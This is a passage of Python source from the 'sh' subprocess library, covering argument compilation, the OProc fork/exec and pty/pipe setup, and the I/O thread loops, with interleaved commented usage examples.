this is added back only to not break the api in the # 1.* version. TODO remove this in 2.0, as "ok_code", if specified, # should always be a definitive value or list of values, and None is # ambiguous if call_args["ok_code"] is None: call_args["ok_code"] = 0 if not getattr(call_args["ok_code"], "__iter__", None): call_args["ok_code"] = [call_args["ok_code"]] # check if we're piping via composition stdin = call_args["in"] if args: first_arg = args.pop(0) if isinstance(first_arg, RunningCommand): if first_arg.call_args["piped"]: stdin = first_arg.process else: stdin = first_arg.process._pipe_queue else: args.insert(0, first_arg) processed_args = compile_args(args, kwargs, call_args["long_sep"], call_args["long_prefix"]) # makes sure our arguments are broken up correctly split_args = self._partial_baked_args + processed_args final_args = split_args cmd.extend(final_args) # if we're running in foreground mode, we need to completely bypass # launching a RunningCommand and OProc and just do a spawn if call_args["fg"]: cwd = call_args["cwd"] or os.getcwd() with pushd(cwd): if call_args["env"] is None: exit_code = os.spawnv(os.P_WAIT, cmd[0], cmd) else: exit_code = os.spawnve(os.P_WAIT, cmd[0], cmd, call_args["env"]) exc_class = get_exc_exit_code_would_raise(exit_code, call_args["ok_code"], call_args["piped"]) if exc_class: if IS_PY3: ran = " ".join([arg.decode(DEFAULT_ENCODING, "ignore") for arg in cmd]) else: ran = " ".join(cmd) exc = exc_class(ran, b"", b"", call_args["truncate_exc"]) raise exc return None # stdout redirection stdout = call_args["out"] if output_redirect_is_filename(stdout): stdout = open(str(stdout), "wb") # stderr redirection stderr = call_args["err"] if output_redirect_is_filename(stderr): stderr = open(str(stderr), "wb") return RunningCommand(cmd, call_args, stdin, stdout, stderr) def compile_args(a, kwargs, sep, prefix): """ takes args and kwargs, as they were passed into the command instance being executed with __call__, and compose them into a flat list that will eventually be fed into exec. example: with this call: sh.ls("-l", "/tmp", color="never") this function receives args = ['-l', '/tmp'] kwargs = {'color': 'never'} and produces ['-l', '/tmp', '--color=never'] """ processed_args = [] encode = encode_to_py3bytes_or_py2str # aggregate positional args for arg in a: if isinstance(arg, (list, tuple)): if isinstance(arg, GlobResults) and not arg: arg = [arg.path] for sub_arg in arg: processed_args.append(encode(sub_arg)) elif isinstance(arg, dict): processed_args += aggregate_keywords(arg, sep, prefix, raw=True) # see https://github.com/amoffat/sh/issues/522 elif arg is None or arg is False: pass else: processed_args.append(encode(arg)) # aggregate the keyword arguments processed_args += aggregate_keywords(kwargs, sep, prefix) return processed_args def aggregate_keywords(keywords, sep, prefix, raw=False): """ take our keyword arguments, and a separator, and compose the list of flat long (and short) arguments. example {'color': 'never', 't': True, 'something': True} with sep '=' becomes ['--color=never', '-t', '--something'] the `raw` argument indicates whether or not we should leave the argument name alone, or whether we should replace "_" with "-". 
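#
# A sketch of two behaviors of __call__ above: piping by passing a RunningCommand as
# the first argument, and prepending via a with-context (assumes passwordless sudo):
#
#   import sh
#
#   print(sh.wc(sh.ls("-1"), "-l"))          # ls's pipe queue becomes wc's stdin
#
#   with sh.sudo:                            # __enter__ calls self(_with=True), so every
#       print(sh.whoami())                   # command in the block is prefixed with sudo
#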
if we pass in a dictionary, like this: sh.command({"some_option": 12}) then `raw` gets set to True, because we want to leave the key as-is, to produce: ['--some_option=12'] but if we just use a command's kwargs, `raw` is False, which means this: sh.command(some_option=12) becomes: ['--some-option=12'] essentially, using kwargs is a convenience, but it lacks the ability to put a '-' in the name, so we do the replacement of '_' to '-' for you. but when you really don't want that to happen, you should use a dictionary instead with the exact names you want """ processed = [] encode = encode_to_py3bytes_or_py2str for k, v in keywords.items(): # we're passing a short arg as a kwarg, example: # cut(d="\t") if len(k) == 1: if v is not False: processed.append(encode("-" + k)) if v is not True: processed.append(encode(v)) # we're doing a long arg else: if not raw: k = k.replace("_", "-") if v is True: processed.append(encode(prefix + k)) elif v is False: pass elif sep is None or sep == " ": processed.append(encode(prefix + k)) processed.append(encode(v)) else: arg = encode("%s%s%s%s" % (prefix, k, sep, v)) processed.append(arg) return processed def _start_daemon_thread(fn, name, exc_queue, *a): def wrap(*rgs, **kwargs): try: fn(*rgs, **kwargs) except Exception as e: exc_queue.put(e) raise thread = threading.Thread(target=wrap, name=name, args=a) thread.daemon = True thread.start() return thread def setwinsize(fd, rows_cols): """ set the terminal size of a tty file descriptor. borrowed logic from pexpect.py """ rows, cols = rows_cols winsize = getattr(termios, 'TIOCSWINSZ', -2146929561) s = struct.pack('HHHH', rows, cols, 0, 0) fcntl.ioctl(fd, winsize, s) def construct_streamreader_callback(process, handler): """ here we're constructing a closure for our streamreader callback. this is used in the case that we pass a callback into _out or _err, meaning we want to our callback to handle each bit of output we construct the closure based on how many arguments it takes. the reason for this is to make it as easy as possible for people to use, without limiting them. a new user will assume the callback takes 1 argument (the data). as they get more advanced, they may want to terminate the process, or pass some stdin back, and will realize that they can pass a callback of more args """ # implied arg refers to the "self" that methods will pass in. 
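#
# A sketch of the argument compilation described above (`sh.command` and its flags
# are made up; curl is assumed to exist):
#
#   import sh
#
#   sh.curl("https://example.com", o="page.html", silent=True)
#       # -> curl https://example.com -o page.html --silent
#   sh.ls(color="never")                     # -> ls --color=never     (long_sep "=")
#   sh.command(some_option=12)               # -> --some-option=12     (kwargs: "_" -> "-")
#   sh.command({"some_option": 12})          # -> --some_option=12     (dict keys kept raw)
#   sh.command(verbose=True, quiet=False)    # True emits the bare flag, False drops it
#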
we need to # account for this implied arg when figuring out what function the user # passed in based on number of args implied_arg = 0 partial_args = 0 handler_to_inspect = handler if isinstance(handler, partial): partial_args = len(handler.args) handler_to_inspect = handler.func if inspect.ismethod(handler_to_inspect): implied_arg = 1 num_args = get_num_args(handler_to_inspect) else: if inspect.isfunction(handler_to_inspect): num_args = get_num_args(handler_to_inspect) # is an object instance with __call__ method else: implied_arg = 1 num_args = get_num_args(handler_to_inspect.__call__) net_args = num_args - implied_arg - partial_args handler_args = () # just the chunk if net_args == 1: handler_args = () # chunk, stdin if net_args == 2: handler_args = (process.stdin,) # chunk, stdin, process elif net_args == 3: # notice we're only storing a weakref, to prevent cyclic references # (where the process holds a streamreader, and a streamreader holds a # handler-closure with a reference to the process handler_args = (process.stdin, weakref.ref(process)) def fn(chunk): # this is pretty ugly, but we're evaluating the process at call-time, # because it's a weakref a = handler_args if len(a) == 2: a = (handler_args[0], handler_args[1]()) return handler(chunk, *a) return fn def get_exc_exit_code_would_raise(exit_code, ok_codes, sigpipe_ok): exc = None success = exit_code in ok_codes bad_sig = -exit_code in SIGNALS_THAT_SHOULD_THROW_EXCEPTION # if this is a piped command, SIGPIPE must be ignored by us and not raise an # exception, since it's perfectly normal for the consumer of a process's # pipe to terminate early if sigpipe_ok and -exit_code == signal.SIGPIPE: bad_sig = False success = True if not success or bad_sig: exc = get_rc_exc(exit_code) return exc def handle_process_exit_code(exit_code): """ this should only ever be called once for each child process """ # if we exited from a signal, let our exit code reflect that if os.WIFSIGNALED(exit_code): exit_code = -os.WTERMSIG(exit_code) # otherwise just give us a normal exit code elif os.WIFEXITED(exit_code): exit_code = os.WEXITSTATUS(exit_code) else: raise RuntimeError("Unknown child exit status!") return exit_code def no_interrupt(syscall, *args, **kwargs): """ a helper for making system calls immune to EINTR """ ret = None while True: try: ret = syscall(*args, **kwargs) except OSError as e: if e.errno == errno.EINTR: continue else: raise else: break return ret class OProc(object): """ this class is instantiated by RunningCommand for a command to be exec'd. it handles all the nasty business involved with correctly setting up the input/output to the child process. it gets its name for subprocess.Popen (process open) but we're calling ours OProc (open process) """ _default_window_size = (24, 80) # used in redirecting STDOUT = -1 STDERR = -2 def __init__(self, command, parent_log, cmd, stdin, stdout, stderr, call_args, pipe, process_assign_lock): """ cmd is the full list of arguments that will be exec'd. it includes the program name and all its arguments. stdin, stdout, stderr are what the child will use for standard input/output/err. call_args is a mapping of all the special keyword arguments to apply to the child process. 
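#
# A sketch of the callback arities handled above; the tool name and prompt are made up:
#
#   import sh
#
#   def log_chunk(chunk):                     # 1 arg: just the output chunk
#       pass
#
#   def interact(chunk, stdin, process):      # 3 args: + stdin queue and (deref'd) process
#       if "Password:" in chunk:
#           stdin.put("secret\n")
#       return True                           # returning True stops further callbacks
#
#   sh.some_tool(_out=interact, _out_bufsize=0)
#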
""" self.command = command self.call_args = call_args # convenience ca = self.call_args if ca["uid"] is not None: if os.getuid() != 0: raise RuntimeError("UID setting requires root privileges") target_uid = ca["uid"] pwrec = pwd.getpwuid(ca["uid"]) target_gid = pwrec.pw_gid else: target_uid, target_gid = None, None # I had issues with getting 'Input/Output error reading stdin' from dd, # until I set _tty_out=False if ca["piped"]: ca["tty_out"] = False self._stdin_process = None # if the objects that we are passing to the OProc happen to be a # file-like object that is a tty, for example `sys.stdin`, then, later # on in this constructor, we're going to skip out on setting up pipes # and pseudoterminals for those endpoints stdin_is_fd_based = ob_is_fd_based(stdin) stdout_is_fd_based = ob_is_fd_based(stdout) stderr_is_fd_based = ob_is_fd_based(stderr) tee_out = ca["tee"] in (True, "out") tee_err = ca["tee"] == "err" single_tty = ca["tty_in"] and ca["tty_out"] and ca["unify_ttys"] # this logic is a little convoluted, but basically this top-level # if/else is for consolidating input and output TTYs into a single # TTY. this is the only way some secure programs like ssh will # output correctly (is if stdout and stdin are both the same TTY) if single_tty: # master_fd, slave_fd = pty.openpty() # # Anything that is written on the master end is provided to the process on the slave end as though it was # input typed on a terminal. -"man 7 pty" # # later, in the child process, we're going to do this, so keep it in mind: # # os.dup2(self._stdin_child_fd, 0) # os.dup2(self._stdout_child_fd, 1) # os.dup2(self._stderr_child_fd, 2) self._stdin_parent_fd, self._stdin_child_fd = pty.openpty() # this makes our parent fds behave like a terminal. it says that the very same fd that we "type" to (for # stdin) is the same one that we see output printed to (for stdout) self._stdout_parent_fd = os.dup(self._stdin_parent_fd) # this line is what makes stdout and stdin attached to the same pty. in other words the process will write # to the same underlying fd as stdout as it uses to read from for stdin. this makes programs like ssh happy self._stdout_child_fd = os.dup(self._stdin_child_fd) self._stderr_parent_fd = os.dup(self._stdin_parent_fd) self._stderr_child_fd = os.dup(self._stdin_child_fd) # do not consolidate stdin and stdout. this is the most common use- # case else: # this check here is because we may be doing piping and so our stdin # might be an instance of OProc if isinstance(stdin, OProc) and stdin.call_args["piped"]: self._stdin_child_fd = stdin._pipe_fd self._stdin_parent_fd = None self._stdin_process = stdin elif stdin_is_fd_based: self._stdin_child_fd = os.dup(get_fileno(stdin)) self._stdin_parent_fd = None elif ca["tty_in"]: self._stdin_parent_fd, self._stdin_child_fd = pty.openpty() # tty_in=False is the default else: self._stdin_child_fd, self._stdin_parent_fd = os.pipe() if stdout_is_fd_based and not tee_out: self._stdout_child_fd = os.dup(get_fileno(stdout)) self._stdout_parent_fd = None # tty_out=True is the default elif ca["tty_out"]: self._stdout_parent_fd, self._stdout_child_fd = pty.openpty() else: self._stdout_parent_fd, self._stdout_child_fd = os.pipe() # unless STDERR is going to STDOUT, it ALWAYS needs to be a pipe, # and never a PTY. the reason for this is not totally clear to me, # but it has to do with the fact that if STDERR isn't set as the # CTTY (because STDOUT is), the STDERR buffer won't always flush # by the time the process exits, and the data will be lost. 
# i've only seen this on OSX. if stderr is OProc.STDOUT: # if stderr is going to stdout, but stdout is a tty or a pipe, # we should not specify a read_fd, because stdout is os.dup'ed # directly to the stdout fd (no pipe), and so stderr won't have # a slave end of a pipe either to dup if stdout_is_fd_based and not tee_out: self._stderr_parent_fd = None else: self._stderr_parent_fd = os.dup(self._stdout_parent_fd) self._stderr_child_fd = os.dup(self._stdout_child_fd) elif stderr_is_fd_based and not tee_err: self._stderr_child_fd = os.dup(get_fileno(stderr)) self._stderr_parent_fd = None else: self._stderr_parent_fd, self._stderr_child_fd = os.pipe() piped = ca["piped"] self._pipe_fd = None if piped: fd_to_use = self._stdout_parent_fd if piped == "err": fd_to_use = self._stderr_parent_fd self._pipe_fd = os.dup(fd_to_use) new_session = ca["new_session"] needs_ctty = ca["tty_in"] and new_session self.ctty = None if needs_ctty: self.ctty = os.ttyname(self._stdin_child_fd) gc_enabled = gc.isenabled() if gc_enabled: gc.disable() # for synchronizing session_pipe_read, session_pipe_write = os.pipe() exc_pipe_read, exc_pipe_write = os.pipe() # this pipe is for synchronizing with the child that the parent has # closed its in/out/err fds. this is a bug on OSX (but not linux), # where we can lose output sometimes, due to a race, if we do # os.close(self._stdout_child_fd) in the parent after the child starts # writing. if IS_MACOS: close_pipe_read, close_pipe_write = os.pipe() else: close_pipe_read, close_pipe_write = None, None # session id, group id, process id self.sid = None self.pgid = None self.pid = os.fork() # child if self.pid == 0: # pragma: no cover if IS_MACOS: os.read(close_pipe_read, 1) os.close(close_pipe_read) os.close(close_pipe_write) # this is critical # our exc_pipe_write must have CLOEXEC enabled. the reason for this is tricky: # if our child (the block we're in now), has an exception, we need to be able to write to exc_pipe_write, so # that when the parent does os.read(exc_pipe_read), it gets our traceback. however, os.read(exc_pipe_read) # in the parent blocks, so if our child *doesn't* have an exception, and doesn't close the writing end, it # hangs forever. not good! but obviously the child can't close the writing end until it knows it's not # going to have an exception, which is impossible to know because but what if os.execv has an exception? so # the answer is CLOEXEC, so that the writing end of the pipe gets closed upon successful exec, and the # parent reading the read end won't block (close breaks the block). flags = fcntl.fcntl(exc_pipe_write, fcntl.F_GETFD) flags |= fcntl.FD_CLOEXEC fcntl.fcntl(exc_pipe_write, fcntl.F_SETFD, flags) try: # ignoring SIGHUP lets us persist even after the parent process # exits. only ignore if we're backgrounded if ca["bg"] is True: signal.signal(signal.SIGHUP, signal.SIG_IGN) # python ignores SIGPIPE by default. we must make sure to put # this behavior back to the default for spawned processes, # otherwise SIGPIPE won't kill piped processes, which is what we # need, so that we can check the error code of the killed # process to see that SIGPIPE killed it signal.signal(signal.SIGPIPE, signal.SIG_DFL) # put our forked process in a new session? this will relinquish # any control of our inherited CTTY and also make our parent # process init if new_session: os.setsid() # if we're not going in a new session, we should go in a new # process group. this way, our process, and any children it # spawns, are alone, contained entirely in one group. 
if we # didn't do this, and didn't use a new session, then our exec'd # process *could* exist in the same group as our python process, # depending on how we launch the process (from a shell, or some # other way) else: os.setpgrp() sid = os.getsid(0) pgid = os.getpgid(0) payload = ("%d,%d" % (sid, pgid)).encode(DEFAULT_ENCODING) os.write(session_pipe_write, payload) if ca["tty_out"] and not stdout_is_fd_based and not single_tty: # set raw mode, so there isn't any weird translation of # newlines to \r\n and other oddities. we're not outputting # to a terminal anyways # # we HAVE to do this here, and not in the parent process, # because we have to guarantee that this is set before the # child process is run, and we can't do it twice. tty.setraw(self._stdout_child_fd) # if the parent-side fd for stdin exists, close it. the case # where it may not exist is if we're using piping if self._stdin_parent_fd: os.close(self._stdin_parent_fd) if self._stdout_parent_fd: os.close(self._stdout_parent_fd) if self._stderr_parent_fd: os.close(self._stderr_parent_fd) os.close(session_pipe_read) os.close(exc_pipe_read) cwd = ca["cwd"] if cwd: os.chdir(cwd) os.dup2(self._stdin_child_fd, 0) os.dup2(self._stdout_child_fd, 1) os.dup2(self._stderr_child_fd, 2) # set our controlling terminal, but only if we're using a tty # for stdin. it doesn't make sense to have a ctty otherwise if needs_ctty: tmp_fd = os.open(os.ttyname(0), os.O_RDWR) os.close(tmp_fd) if ca["tty_out"] and not stdout_is_fd_based: setwinsize(1, ca["tty_size"]) if ca["uid"] is not None: os.setgid(target_gid) os.setuid(target_uid) preexec_fn = ca["preexec_fn"] if callable(preexec_fn): preexec_fn() close_fds = ca["close_fds"] if ca["pass_fds"]: close_fds = True if close_fds: pass_fds = set((0, 1, 2, exc_pipe_write)) pass_fds.update(ca["pass_fds"]) # don't inherit file descriptors inherited_fds = os.listdir("/dev/fd") inherited_fds = set(int(fd) for fd in inherited_fds) - pass_fds for fd in inherited_fds: try: os.close(fd) except OSError: pass # actually execute the process if ca["env"] is None: os.execv(cmd[0], cmd) else: os.execve(cmd[0], cmd, ca["env"]) # we must ensure that we carefully exit the child process on # exception, otherwise the parent process code will be executed # twice on exception https://github.com/amoffat/sh/issues/202 # # if your parent process experiences an exit code 255, it is most # likely that an exception occurred between the fork of the child # and the exec. this should be reported. except: # noqa: E722 # some helpful debugging tb = traceback.format_exc().encode("utf8", "ignore") try: os.write(exc_pipe_write, tb) except Exception as e: # dump to stderr if we cannot save it to exc_pipe_write sys.stderr.write("\nFATAL SH ERROR: %s\n" % e) finally: os._exit(255) # parent else: if gc_enabled: gc.enable() os.close(self._stdin_child_fd) os.close(self._stdout_child_fd) os.close(self._stderr_child_fd) # tell our child process that we've closed our write_fds, so it is # ok to proceed towards exec. 
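#
# A sketch of the per-child hooks applied above (script name and niceness are made up):
#
#   import os, sh
#
#   r, w = os.pipe()
#
#   def before_exec():                        # runs in the child after fork, before exec
#       os.nice(5)
#
#   sh.python3("worker.py",
#              _preexec_fn=before_exec,
#              _pass_fds={w},                 # keep this fd open despite close_fds
#              _cwd="/tmp")
#   os.close(r)
#   os.close(w)
#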
see the comment where this pipe is # opened, for why this is necessary if IS_MACOS: os.close(close_pipe_read) os.write(close_pipe_write, str(1).encode(DEFAULT_ENCODING)) os.close(close_pipe_write) os.close(exc_pipe_write) fork_exc = os.read(exc_pipe_read, 1024 ** 2) os.close(exc_pipe_read) if fork_exc: fork_exc = fork_exc.decode(DEFAULT_ENCODING) raise ForkException(fork_exc) os.close(session_pipe_write) sid, pgid = os.read(session_pipe_read, 1024).decode(DEFAULT_ENCODING).split(",") os.close(session_pipe_read) self.sid = int(sid) self.pgid = int(pgid) # used to determine what exception to raise. if our process was # killed via a timeout counter, we'll raise something different than # a SIGKILL exception self.timed_out = False self.started = time.time() self.cmd = cmd # exit code should only be manipulated from within self._wait_lock # to prevent race conditions self.exit_code = None self.stdin = stdin # this accounts for when _out is a callable that is passed stdin. in that case, if stdin is unspecified, we # must set it to a queue, so callbacks can put things on it if callable(ca["out"]) and self.stdin is None: self.stdin = Queue() # _pipe_queue is used internally to hand off stdout from one process # to another. by default, all stdout from a process gets dumped # into this pipe queue, to be consumed in real time (hence the # thread-safe Queue), or at a potentially later time self._pipe_queue = Queue() # this is used to prevent a race condition when we're waiting for # a process to end, and the OProc's internal threads are also checking # for the processes's end self._wait_lock = threading.Lock() # these are for aggregating the stdout and stderr. we use a deque # because we don't want to overflow self._stdout = deque(maxlen=ca["internal_bufsize"]) self._stderr = deque(maxlen=ca["internal_bufsize"]) if ca["tty_in"] and not stdin_is_fd_based: setwinsize(self._stdin_parent_fd, ca["tty_size"]) self.log = parent_log.get_child("process", repr(self)) self.log.debug("started process") # disable echoing, but only if it's a tty that we created ourselves if ca["tty_in"] and not stdin_is_fd_based: attr = termios.tcgetattr(self._stdin_parent_fd) attr[3] &= ~termios.ECHO termios.tcsetattr(self._stdin_parent_fd, termios.TCSANOW, attr) # this represents the connection from a Queue object (or whatever # we're using to feed STDIN) to the process's STDIN fd self._stdin_stream = None if self._stdin_parent_fd: log = self.log.get_child("streamwriter", "stdin") self._stdin_stream = StreamWriter(log, self._stdin_parent_fd, self.stdin, ca["in_bufsize"], ca["encoding"], ca["tty_in"]) stdout_pipe = None if pipe is OProc.STDOUT and not ca["no_pipe"]: stdout_pipe = self._pipe_queue # this represents the connection from a process's STDOUT fd to # wherever it has to go, sometimes a pipe Queue (that we will use # to pipe data to other processes), and also an internal deque # that we use to aggregate all the output save_stdout = not ca["no_out"] and (tee_out or stdout is None) pipe_out = ca["piped"] in ("out", True) pipe_err = ca["piped"] in ("err",) # if we're piping directly into another process's file descriptor, we # bypass reading from the stdout stream altogether, because we've # already hooked up this processes's stdout fd to the other # processes's stdin fd self._stdout_stream = None if not pipe_out and self._stdout_parent_fd: if callable(stdout): stdout = construct_streamreader_callback(self, stdout) self._stdout_stream = StreamReader( self.log.get_child("streamreader", "stdout"), self._stdout_parent_fd, 
stdout, self._stdout, ca["out_bufsize"], ca["encoding"], ca["decode_errors"], stdout_pipe, save_data=save_stdout ) elif self._stdout_parent_fd: os.close(self._stdout_parent_fd) # if stderr is going to one place (because it's grouped with stdout, # or we're dealing with a single tty), then we don't actually need a # stream reader for stderr, because we've already set one up for # stdout above self._stderr_stream = None if stderr is not OProc.STDOUT and not single_tty and not pipe_err and self._stderr_parent_fd: stderr_pipe = None if pipe is OProc.STDERR and not ca["no_pipe"]: stderr_pipe = self._pipe_queue save_stderr = not ca["no_err"] and (ca["tee"] in ("err",) or stderr is None) if callable(stderr): stderr = construct_streamreader_callback(self, stderr) self._stderr_stream = StreamReader( Logger("streamreader"), self._stderr_parent_fd, stderr, self._stderr, ca["err_bufsize"], ca["encoding"], ca["decode_errors"], stderr_pipe, save_data=save_stderr ) elif self._stderr_parent_fd: os.close(self._stderr_parent_fd) def timeout_fn(): self.timed_out = True self.signal(ca["timeout_signal"]) self._timeout_event = None self._timeout_timer = None if ca["timeout"]: self._timeout_event = threading.Event() self._timeout_timer = threading.Timer(ca["timeout"], self._timeout_event.set) self._timeout_timer.start() # this is for cases where we know that the RunningCommand that was # launched was not .wait()ed on to complete. in those unique cases, # we allow the thread that processes output to report exceptions in # that thread. it's important that we only allow reporting of the # exception, and nothing else (like the additional stuff that # RunningCommand.wait() does), because we want the exception to be # re-raised in the future, if we DO call .wait() handle_exit_code = None if not self.command._spawned_and_waited and ca["bg_exc"]: def fn(exit_code): with process_assign_lock: return self.command.handle_command_exit_code(exit_code) handle_exit_code = fn self._quit_threads = threading.Event() thread_name = "background thread for pid %d" % self.pid self._bg_thread_exc_queue = Queue(1) self._background_thread = _start_daemon_thread( background_thread, thread_name, self._bg_thread_exc_queue, timeout_fn, self._timeout_event, handle_exit_code, self.is_alive, self._quit_threads ) # start the main io threads. stdin thread is not needed if we are # connecting from another process's stdout pipe self._input_thread = None self._input_thread_exc_queue = Queue(1) if self._stdin_stream: close_before_term = not needs_ctty thread_name = "STDIN thread for pid %d" % self.pid self._input_thread = _start_daemon_thread( input_thread, thread_name, self._input_thread_exc_queue, self.log, self._stdin_stream, self.is_alive, self._quit_threads, close_before_term ) # this event is for cases where the subprocess that we launch # launches its OWN subprocess and os.dup's the stdout/stderr fds to that # new subprocess. in that case, stdout and stderr will never EOF, # so our output_thread will never finish and will hang. 
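#
# A sketch of the background-exception reporting wired up above via _bg_exc (the path
# is made up):
#
#   import sh
#
#   p = sh.ls("/no/such/path", _bg=True, _bg_exc=False)   # silence the async report
#   try:
#       p.wait()                                          # the failure surfaces here
#   except sh.ErrorReturnCode:
#       pass
#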
this event # prevents that hanging self._stop_output_event = threading.Event() self._output_thread_exc_queue = Queue(1) thread_name = "STDOUT/ERR thread for pid %d" % self.pid self._output_thread = _start_daemon_thread( output_thread, thread_name, self._output_thread_exc_queue, self.log, self._stdout_stream, self._stderr_stream, self._timeout_event, self.is_alive, self._quit_threads, self._stop_output_event ) def __repr__(self): return "<Process %d %r>" % (self.pid, self.cmd[:500]) # these next 3 properties are primary for tests @property def output_thread_exc(self): exc = None try: exc = self._output_thread_exc_queue.get(False) except Empty: pass return exc @property def input_thread_exc(self): exc = None try: exc = self._input_thread_exc_queue.get(False) except Empty: pass return exc @property def bg_thread_exc(self): exc = None try: exc = self._bg_thread_exc_queue.get(False) except Empty: pass return exc def change_in_bufsize(self, buf): self._stdin_stream.stream_bufferer.change_buffering(buf) def change_out_bufsize(self, buf): self._stdout_stream.stream_bufferer.change_buffering(buf) def change_err_bufsize(self, buf): self._stderr_stream.stream_bufferer.change_buffering(buf) @property def stdout(self): return "".encode(self.call_args["encoding"]).join(self._stdout) @property def stderr(self): return "".encode(self.call_args["encoding"]).join(self._stderr) def get_pgid(self): """ return the CURRENT group id of the process. this differs from self.pgid in that this reflects the current state of the process, where self.pgid is the group id at launch """ return os.getpgid(self.pid) def get_sid(self): """ return the CURRENT session id of the process. this differs from self.sid in that this reflects the current state of the process, where self.sid is the session id at launch """ return os.getsid(self.pid) def signal_group(self, sig): self.log.debug("sending signal %d to group", sig) os.killpg(self.get_pgid(), sig) def signal(self, sig): self.log.debug("sending signal %d", sig) os.kill(self.pid, sig) def kill_group(self): self.log.debug("killing group") self.signal_group(signal.SIGKILL) def kill(self): self.log.debug("killing") self.signal(signal.SIGKILL) def terminate(self): self.log.debug("terminating") self.signal(signal.SIGTERM) def is_alive(self): """ polls if our child process has completed, without blocking. this method has side-effects, such as setting our exit_code, if we happen to see our child exit while this is running """ if self.exit_code is not None: return False, self.exit_code # what we're doing here essentially is making sure that the main thread # (or another thread), isn't calling .wait() on the process. because # .wait() calls os.waitpid(self.pid, 0), we can't do an os.waitpid # here...because if we did, and the process exited while in this # thread, the main thread's os.waitpid(self.pid, 0) would raise OSError # (because the process ended in another thread). # # so essentially what we're doing is, using this lock, checking if # we're calling .wait(), and if we are, let .wait() get the exit code # and handle the status, otherwise let us do it. acquired = self._wait_lock.acquire(False) if not acquired: if self.exit_code is not None: return False, self.exit_code return True, self.exit_code try: # WNOHANG is just that...we're calling waitpid without hanging... # essentially polling the process. 
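#
# A sketch of the signal helpers defined above, driven from the parent side:
#
#   import sh
#
#   p = sh.sleep(100, _bg=True)
#   p.process.terminate()               # SIGTERM; kill()/signal_group() also exist
#   try:
#       p.wait()
#   except sh.SignalException:          # a signal death raises a SignalException subclass
#       pass
#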
the return result is (0, 0) if # there's no process status, so we check that pid == self.pid below # in order to determine how to proceed pid, exit_code = no_interrupt(os.waitpid, self.pid, os.WNOHANG) if pid == self.pid: self.exit_code = handle_process_exit_code(exit_code) self._process_just_ended() return False, self.exit_code # no child process except OSError: return False, self.exit_code else: return True, self.exit_code finally: self._wait_lock.release() def _process_just_ended(self): if self._timeout_timer: self._timeout_timer.cancel() done_callback = self.call_args["done"] if done_callback: success = self.exit_code in self.call_args["ok_code"] done_callback(success, self.exit_code) # this can only be closed at the end of the process, because it might be # the CTTY, and closing it prematurely will send a SIGHUP. we also # don't want to close it if there's a self._stdin_stream, because that # is in charge of closing it also if self._stdin_parent_fd and not self._stdin_stream: os.close(self._stdin_parent_fd) def wait(self): """ waits for the process to complete, handles the exit code """ self.log.debug("acquiring wait lock to wait for completion") # using the lock in a with-context blocks, which is what we want if # we're running wait() with self._wait_lock: self.log.debug("got wait lock") witnessed_end = False if self.exit_code is None: self.log.debug("exit code not set, waiting on pid") pid, exit_code = no_interrupt(os.waitpid, self.pid, 0) # blocks self.exit_code = handle_process_exit_code(exit_code) witnessed_end = True else: self.log.debug("exit code already set (%d), no need to wait", self.exit_code) self._quit_threads.set() # we may not have a thread for stdin, if the pipe has been connected # via _piped="direct" if self._input_thread: self._input_thread.join() # wait, then signal to our output thread that the child process is # done, and we should have finished reading all the stdout/stderr # data that we can by now timer = threading.Timer(2.0, self._stop_output_event.set) timer.start() # wait for our stdout and stderr streamreaders to finish reading and # aggregating the process output self._output_thread.join() timer.cancel() self._background_thread.join() if witnessed_end: self._process_just_ended() return self.exit_code def input_thread(log, stdin, is_alive, quit_thread, close_before_term): """ this is run in a separate thread. it writes into our process's stdin (a streamwriter) and waits the process to end AND everything that can be written to be written """ closed = False alive = True poller = Poller() poller.register_write(stdin) while poller and alive: changed = poller.poll(1) for fd, events in changed: if events & (POLLER_EVENT_WRITE | POLLER_EVENT_HUP): log.debug("%r ready for more input", stdin) done = stdin.write() if done: poller.unregister(stdin) if close_before_term: stdin.close() closed = True alive, _ = is_alive() while alive: quit_thread.wait(1) alive, _ = is_alive() if not closed: stdin.close() def event_wait(ev, timeout=None): triggered = ev.wait(timeout) if IS_PY26: triggered = ev.is_set() return triggered def background_thread(timeout_fn, timeout_event, handle_exit_code, is_alive, quit_thread): """ handles the timeout logic """ # if there's a timeout event, loop if timeout_event: while not quit_thread.is_set(): timed_out = event_wait(timeout_event, 0.1) if timed_out: timeout_fn() break # handle_exit_code will be a function ONLY if our command was NOT waited on # as part of its spawning. 
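#
# A sketch of the done-callback invocation above: the user callback receives the
# RunningCommand (via partial), then success and exit_code:
#
#   import sh
#
#   def report(cmd, success, exit_code):
#       print(cmd.ran, "ok" if success else "failed", exit_code)
#
#   p = sh.uptime(_bg=True, _done=report)
#   p.wait()
#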
in other words, it's probably a background # command # # this reports the exit code exception in our thread. it's purely for the # user's awareness, and cannot be caught or used in any way, so it's ok to # suppress this during the tests if handle_exit_code and not RUNNING_TESTS: # pragma: no cover alive = True exit_code = None while alive: quit_thread.wait(1) alive, exit_code = is_alive() handle_exit_code(exit_code) def output_thread(log, stdout, stderr, timeout_event, is_alive, quit_thread, stop_output_event): """ this function is run in a separate thread. it reads from the process's stdout stream (a streamreader), and waits for it to claim that its done """ poller = Poller() if stdout is not None: poller.register_read(stdout) if stderr is not None: poller.register_read(stderr) # this is our poll loop for polling stdout or stderr that is ready to # be read and processed. if one of those streamreaders indicate that it # is done altogether being read from, we remove it from our list of # things to poll. when no more things are left to poll, we leave this # loop and clean up while poller: changed = no_interrupt(poller.poll, 0.1) for f, events in changed: if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP): log.debug("%r ready to be read from", f) done = f.read() if done: poller.unregister(f) elif events & POLLER_EVENT_ERROR: # for some reason, we have to just ignore streams that have had an # error. i'm not exactly sure why, but don't remove this until we # figure that out, and create a test for it pass if timeout_event and timeout_event.is_set(): break if stop_output_event.is_set(): break # we need to wait until the process is guaranteed dead before closing our # outputs, otherwise SIGPIPE alive, _ = is_alive() while alive: quit_thread.wait(1) alive, _ = is_alive() if stdout: stdout.close() if stderr: stderr.close() class DoneReadingForever(Exception): pass class NotYetReadyToRead(Exception): pass def determine_how_to_read_input(input_obj): """ given some kind of input object, return a function that knows how to read chunks of that input object. each reader function should return a chunk and raise a DoneReadingForever exception, or return None, when there's no more data to read NOTE: the function returned does not need to care much about the requested buffering type (eg, unbuffered vs newline-buffered). the StreamBufferer will take care of that. these functions just need to return a reasonably-sized chunk of data. 
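#
# A sketch of the stdin types resolved above (file names are made up):
#
#   import sh
#   from queue import Queue
#
#   sh.cat(_in="from a string\n")                       # strings/bytes are chunked
#   sh.cat(_in=open("notes.txt", "rb"))                 # file-like objects are read()
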